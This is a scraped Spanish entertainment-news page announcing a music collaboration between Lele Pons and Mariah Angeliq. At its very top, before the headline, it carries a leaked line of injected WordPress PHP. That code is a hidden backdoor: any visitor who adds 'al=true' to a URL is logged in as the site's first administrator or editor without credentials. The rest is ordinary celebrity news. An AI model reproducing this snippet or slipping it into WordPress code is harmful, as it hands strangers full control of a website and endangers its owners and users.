// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Lele Pons sigue anunciando estrenos musicales - Dicomania Tu Manía
MusicManía

Lele Pons sigue anunciando estrenos musicales

Lele Pons es una de las influencer más reconocidas a nivel internacional, sumando más de 42 millones de seguidores en instagram.

La venezolana ha logrado incursionar en la industria musical con éxitos como Celosos, Volar y Se Te Nota. Esta vez, se une Mariah Angeliq para estrenar «Lento y Sucio». Angeliq es una cantante estadounidense que se ha convertido en un ícono del reggaetón y el trap latino.

La colaboración se confirmó, luego de que ambas publicaran una foto en lencería, emocionando a sus seguidores.

Ver esta publicación en Instagram

#SucioYLento con @lelepons sale este viernes 10/16 😈😇 UYYYYY

Advertisements

Una publicación compartida de Its Mariah Baby (@mariahangeliq) el

Y con un pequeño adelanto de lo que será este Hit, las artistas anuncias su sencillo para el próximo 16 de octubre, en donde demostrarán su talento y sensualidad.

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

To Top